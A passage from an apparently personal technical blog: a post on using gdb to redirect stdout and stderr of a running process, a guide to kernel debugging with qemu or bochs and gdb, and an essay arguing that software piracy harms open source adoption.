Let us analyze how nohup works. If output of nohup is not redirected to some file, by default all the output of nohup-ed program goes to some default file (such as $HOME/nohup.out or $PWD/nohup.out). In any case, nohup has a writeable file descriptor to the file where output is supposed to go. Immediately after fork() but before exec(), nohup duplicates this fd to stdout and stderr using dup2(). This way, the child can keep running after being released from the shell without SIGHUP (which means it's parent=1), as stdout and stderr fds are still valid because they no longer are the fds of parent shell but fds of some real file opened. Stdin is probably uncared for as we are running the process in background, non-interactive mode after all.

The question is : all this is fine as it is done _before_ starting the java process. What can we do to change it's stdout and stderr _after_ it has been launched already?
Note that we can not modify /proc/1001/fd/1 to link to some real file (me wonders what issues would creep up if it was allowed).

Our good old friend gdb comes to rescue! The solution is trivial. Just attach the process, open a file you want the output to go to within that program with open() and dup2() the new fd to 1 and 2 :D

% gdb -p 1001
....
Attaching to process 1001
Reading symbols from /usr/bin/java...(no debugging symbols found)...done.
...
(gdb) call open("/home/prashant/tmp/output", O_WRONLY | O_CREAT | O_APPEND)
$1 = 5
(gdb) call dup2(5,1)
$2 = 1
(gdb) call open("/home/prashant/tmp/output.err", O_WRONLY | O_CREAT | O_APPEND)
$1 = 6
(gdb) call dup2(6,2)
$3 = 2
(gdb) detach 
Detaching from program: /usr/bin/java, process 1001
(gdb) quit
%

In case debug info is not available, you can replace the O_ macros to actual values in fcntl.h

...
(gdb) call dup2(open("/home/prashant/tmp/output", 0x209),1)
$2 = 1
(gdb) call dup2(open("/home/prashant/tmp/output.err", 0x209),2)
$3 = 2
(gdb) detach
...

Note that you can redirect stdin and stdout in same file if you wish (just be careful with append mode on NFS and truncate mode in general ;).

And that's about it. Go ahead and logout. Your process should be busy while you are gone.

PS : this will work as long as the program does not try to read anything from stdin. If and when it does, it may crash depending on whether the program abort()s when it can not do basic IO on fds 0,1 and 2. You might want to open another file to read and use dup2() in similar way if you plan to provide input from a file.

Monday, March 29, 2010

Debugging kernel with qemu and gdb

Assuming that you have your (or Linux/*BSD/Solaris/Windows or any other) kernel on a bootable device, you can debug the kernel and also the loadable modules as well as user mode applications with QEmu/Bochs and good old gdb.

Configuring QEmu

You need qemu compiled with gdb support. QEmu needs no configuration file as such, and can be launched with gdb support as:

qemu -hda hd.img -fda floppy.img -boot ac -m 512M -S -gdb tcp::5022

After this, qemu will continue executing the VM, and wait for a gdbmi connection on tcp 5022.

Configuring bochs

bochs is one of the most popular emulators in the hobbyist x86 kernel developers' world. Again, you need bochs which was configured and compiled with gdb stub. Some distributions like Fedora have a separate package for bochs with gdb stub, in case you do not want to go through the trouble of compiling it yourself.

Bochs needs a configuration file for launching a VM. Assuming you know the basic syntax, go ahead and add the following :

gdbstub: enabled=1, port=5022, text_base=0, data_base=0, bss_base=0

adjust the segment bases according to the bases of your segments. If you are following a flat memory model, pin them to 0.
After starting with this config, bochs will wait for a gdb connection even before the first instruction in BIOS trampoline is executed. This way you can debug a bootloader, and also your custom bios!

GDB

Obviously you need to compile what you plan to debug (be it kernel, user libs, user apps) with good amount of debug support. -g3 with gcc is my default. Not to mention, do not strip the binaries.

Start up gdb.

This tells gdb to read debug info from kernel image 'krnl/kernel'.

file krnl/kernel

This tells gdb to connect with a gdbmi connection to tcp 5022, the port on which either qemu or bochs is already waiting.

target remote localhost:5022

In order to debug user mode apps,

add-symbol-file apps/testApp1.elf 0x04000000

There you go. Now you can pretty much debug the entire system so as to say. Almost all common gdb commands like breakpoint, watchpoint, assembly debugging etc. work without sweat. If your fingers hurt, put all these commands in a file named '.gdbinit' in your project directory. gdb will pick it up and load and connect automatically.

This can save gazillions of man hours of a hobby kernel developer. Believe me, printk debugging is no fun. Source level kernel debugging when you are writing IDT handling code is must. When writing interrupt handler and paging, I have wasted two weekends in pleasing company of triple faults, completely clueless.

For the sickle minded and the general wannabe h4x0r, you just got a (way more) powerful alternative to rootkits. Rev those dongles and drivers. Let your imagination run wild ;)

Tuesday, February 16, 2010

Software piracy and Open Source (OSS)

Software piracy eats up a lot of revenue of the big guys. One might think that since piracy is bad for software companies selling proprietary software, it is good for open source. It is surprising to see many open source followers correlate lower business or loss of software giants (due to piracy) with growth or victory of open source. I believe this is not true.

Take example of Microsoft Windows. Paying for windows is a new concept for many people in the place I come from. Undoubtedly, Windows is the best operating system to go for if you are a serious gamer, as almost all games that come for PC are targeted at Windows. If you do not have Windows, you are left out. At this point, there are two choices - either legally buy a copy of Windows, or use a pirated copy. If you buy, you have already fueled the proprietary engine.

Assuming you chose to use pirated copy instead, you essentially got it for free (in a free beer sense, even though you do not have the sources and consent that you can freely modify and redistribute). This is where comparison starts between pirated proprietary software and the open source alternative. Many times the open source alternatives are under-manned and under-funded, which means they lack some (probably game changing) features that are present only in the proprietary software. This makes the open source versions look inferior. The general public does not think twice; they can get both for same price - free! Obviously they would go for the better proprietary version. They do not realize that they are weighing watermelons (well funded, manned and planned proprietary software) against grapes(OSS), and the OSS alternative loses popularity. As OSS versions' popularity reduces, more and more people turn to the proprietary software, either buying it or using pirated copies - a vicious circle. As more and more people use Windows, more and more softwares (utilities, office software, games, multimedia etc.) are made available for windows (many times exclusively), which in turn attracts even more people towards Windows. If not a single person used pirated Windows, the number of installations of Windows would be _significantly_ lesser than it is now, which would force application developers to write software that also runs on other operating systems, which in turn will lead to more adaptation of non-Windows operating systems by people. It is essentially a balance, which miraculously tilts in favor of proprietary software when it is pirated. This is why some companies deliberately let people use pirated copies of their softwares long enough to set the `vendor lock-in'.

I believe this is true for any proprietary software and it's OSS alternatives. To break this cycle, next time someone asks you for a pirated copy of a software, hand him an (or a list of) OSS alternative, ask him to support the development team by providing money, manuals, free advertisement space, compute power etc.

When two or more OSS softwares doing similar things compete against each other, the price and piracy factors are missing from the equation, but everything else still holds - the better the software at solving users' problems, the more followers/popularity/user-base it will get. A purely merit based system/balance! We want people to fairly compare proprietary software and corresponding OSS on equal grounds, which means asking users to compare the copy of Windows they _bought_ for a couple hundred dollars, with Linux which is available for free.

I still do not know if the open source model is the best for our industry, but if you strongly believe in open source, please persuade people not to pirate.